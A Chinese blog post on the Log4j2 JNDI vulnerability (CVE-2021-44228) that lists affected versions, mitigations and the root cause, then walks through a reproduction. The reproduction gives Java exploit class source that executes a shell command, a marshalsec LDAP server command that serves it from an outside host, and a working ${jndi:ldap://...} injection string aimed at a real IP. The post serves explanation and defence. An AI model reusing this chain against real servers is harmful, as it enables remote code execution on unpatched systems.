LOG4J2史诗级漏洞

LOG4J2史诗级漏洞
逐暗者log4j2史诗级漏洞
背景
12月9日晚,Apache Log4j2被曝出一个高危漏洞CVE-2021-44228,攻击者只需要输入一段代码,就可以控制受害者服务器,利用门槛极低。
目前Log4j 团队已注意到一个安全漏洞 CVE-2021-44228,该漏洞已在 Log4j 2.15.0 中得到解决。
漏洞基本信息
受影响的版本为Log4j2.X < 2.15.0
修复方式
- 方法一:升级Log4j2的版本至2.15.0
- 方法二:在版本> = 2.10,设置系统属性log4j2.formatMsgNoLookups=true或环境变量LOG4J_FORMAT_MSG_NO_LOOKUPS=true。对于 >=2.7 和 <=2.14.1 的版本,PatternLayout可以修改所有模式以将消息转换器指定为 ,%m{nolookups}而不仅仅是%m。对于> = 2.0-beta9和<= 2.10.0,方法是去除JndiLookup类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- 方法三:禁止服务器访问外网
漏洞原理
java在部分低版本时允许通过rmi、LDAP-JNDI注入一些不属于本JVM中的类,并运行。log4j2的PatternLayout中的format调用了lookup,并且没有检查是否是本地协议,从而导致出现了问题。
复现漏洞
建立一个使用log4j2的项目,版本可以设置为小于2.15.0的版本,可以使用2.9.0 。
新建一个恶意文件Exploit ,这里主要是启动macos中的计算器,用于演示可以控制jvm所在主机。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26import java.io.IOException;
import java.io.Serializable;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
public class Exploit implements ObjectFactory, Serializable {
public Exploit(){
try{
Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
}catch (IOException e){
e.printStackTrace();
}
}
public static void main(String[] args){
Exploit exploit = new Exploit();
}
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
return null;
}
}使用jdk8(尽量使用低版本)编译这个java文件,然后找个(非目标)服务器放上去。尽量使用低版本是为了防止目标服务器jre版本过低导致高版本编译的class无法在低版本jvm上运行。
构建一个jndi服务器,用于传输这个class文件,推荐使用marshalsec。
1
java -cp /data/javaapp/ldap/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ldap.shellingford.cn/#Exploit 6666
启动demo程序,写入日志即可。
1
2
3
4public static void main(String[] args) {
logger.error(System.getProperty("java.version"));
logger.error("${jndi:ldap://23.95.230.154:6666/a}");
}
效果图:
如果没有效果就需要检查运行的jvm版本了,对照上面的图,在部分jdk版本以上,修复了ldap-jndi注入。
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果